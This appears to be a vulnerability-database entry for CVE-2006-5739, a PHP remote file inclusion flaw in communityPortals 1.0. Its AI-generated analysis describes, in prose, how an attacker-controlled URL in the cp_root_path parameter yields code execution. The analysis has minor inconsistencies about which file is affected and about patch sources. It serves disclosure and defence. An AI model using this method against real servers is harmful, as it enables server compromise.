CVE-2006-5739
Description
PHP remote file inclusion in Leicestershire communityPortals 1.0 allows arbitrary code execution via the cp_root_path parameter.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
PHP remote file inclusion in Leicestershire communityPortals 1.0 allows arbitrary code execution via the cp_root_path parameter.
Vulnerability
A PHP remote file inclusion vulnerability exists in cpadmin/cpa_index.php within Leicestershire communityPortals version 1.0_2005-10-18_12-31-18. This vulnerability is triggered when a specially crafted URL is provided in the cp_root_path parameter, allowing remote attackers to include arbitrary files [1].
Exploitation
An attacker can exploit this vulnerability by sending a request to the vulnerable cpadmin/cpa_index.php script with a URL pointing to a remote file in the cp_root_path parameter. This requires the server to be configured to allow remote file inclusions and for the attacker to know the path to the vulnerable script [1].
Impact
Successful exploitation allows a remote attacker to execute arbitrary PHP code on the server. This can lead to a full compromise of the affected server, depending on the privileges of the web server process.
Mitigation
A patch for this vulnerability is unavailable according to the provided reference [1]. Users are advised to upgrade to a version where this vulnerability is fixed, if such a version exists, or to implement other security measures to prevent remote file inclusions.
AI Insight generated on Jun 2, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2cpe:2.3:a:leicestershire:communityportals:1.0:*:*:*:*:*:*:*+ 1 more
- cpe:2.3:a:leicestershire:communityportals:1.0:*:*:*:*:*:*:*
- (no CPE)range: = 1.0_2005-10-18_12-31-18
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"The application does not properly sanitize user-supplied input in the cp_root_path parameter, allowing for remote file inclusion."
Attack vector
An attacker can send a crafted GET request to `cpadmin/cpa_index.php` with a URL in the `cp_root_path` parameter. This URL points to a remote file on an attacker-controlled server. The application then includes and executes the content of this remote file, leading to arbitrary code execution. This is a different vector than CVE-2006-5280 [ref_id=1].
Affected code
The vulnerability exists in the `cpadmin/cpa_index.php` file, specifically in how it handles the `cp_root_path` parameter. The exploit targets the `includes/import-archive.php` script, which is included by `cpadmin/cpa_index.php` [ref_id=1].
What the fix does
The patch is unavailable. The advisory recommends that users upgrade to a patched version once it becomes available. Until then, users should be cautious of this vulnerability [ref_id=1].
Preconditions
- networkThe vulnerable application must be accessible over the network.
- inputThe attacker must be able to control the value of the `cp_root_path` parameter.
Reproduction
The provided exploit script demonstrates how to trigger the vulnerability by specifying a remote URL for the `cp_root_path` parameter [ref_id=1].
Generated on Jun 2, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
2News mentions
0No linked articles in our index yet.